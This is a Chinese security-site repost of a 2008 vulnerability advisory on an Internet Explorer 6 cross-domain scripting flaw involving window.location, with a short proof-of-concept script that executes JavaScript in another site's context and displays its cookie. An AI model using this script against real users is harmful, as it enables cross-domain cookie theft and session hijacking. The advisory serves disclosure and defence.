当前位置:信息安全资讯首页 >> 漏洞 >> Microsoft IE location及location.href绕过跨域安全限制漏洞

Microsoft IE location及location.href绕过跨域安全限制漏洞

2008-07-01 10:03:55  作者:  来源:互联网  浏览次数:79  文字大小:【】【】【
发布日期:2008-06-26
更新日期:2008-06-27

受影响系统:
Microsoft Internet Explorer 6.0
    - Microsoft Windows XP SP2
描述:
BUGTRAQ  ID:
29960

Internet Explorer是微软发布的非常流行的WEB浏览器。

IE没有正确地处理窗口对象的location或location.href属性,如果用户受骗访问了恶意站点的话,就会绕过跨域安全限制,在用户浏览器会话中执行任意指令。

这个跨域安全问题的本质是浏览器在处理window对象的操作有所疏漏,没有考虑清楚不同域有继承关系的window对象操作后的变化,只是对window对象的一些方法的参数做了类似数据类型的限制,导致最后绕过限制跨域执行了脚本。

<*来源:rayh4c (
rayh4c@80sec.com
  
  链接:
http://secunia.com/advisories/30857/
        http://blogs.zdnet.com/security/?p=1348
        http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x02_0x04.txt
        http://www.kb.cert.org/vuls/id/923508
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<a href="">IE6 Cross Domain Scripting</a>
    <script>
    function win(){
        x=window.open('
http://www.phpwind.net');
        setTimeout(function(){
            x.location=new String("javascript:alert(document.cookie)")
        },3000)
    }
    window.onload=function(){
        for (i=0;i<document.links.length;i++) {
            document.links.href="javascript:win()"
        }
    }
    </script>

建议:
厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp


本安全漏洞由绿盟科技翻译整理

责任编辑:gxis_admin


相关文章
 

最新文章

更多

· 微软2009年10月安全公告...
· Google Group 遭黑客利用...
· 安全公司称五大SOA架构都...
· 解析MS09-008:DNS和WIN...
· 浅析微软Excel漏洞及解决...
· MS09-002 IE7漏洞原理分析
· Sun Java系统目录服务器...
· Microsoft Exchange 中的...
· Microsoft SQL Server 中...
· Microsoft Office Visio...

推荐文章

更多

· 微软2009年10月安全公告...
· Google Group 遭黑客利用...
· 安全公司称五大SOA架构都...
· 解析MS09-008:DNS和WIN...
· 浅析微软Excel漏洞及解决...
· MS09-002 IE7漏洞原理分析
· Sun Java系统目录服务器...
· Microsoft Exchange 中的...
· Microsoft SQL Server 中...
· Microsoft Office Visio...

热点文章

更多

· 微软2009年10月安全公告...

友情链接

更多 >>

广西信息网络安全报警网站 南宁市公安局网络警察支队 广西壮族自治区民政厅 国家计算机病毒应急处理中心 广西金普威科技有限责任公司
蓝盾信息安全技术股份有限公司 珠海捷郎菱网络科技有限公司 中国互联安全网 广西顶佳计算机信息有限公司 全国信息网络安全协会联盟
数谷网
桂ICP备05007911号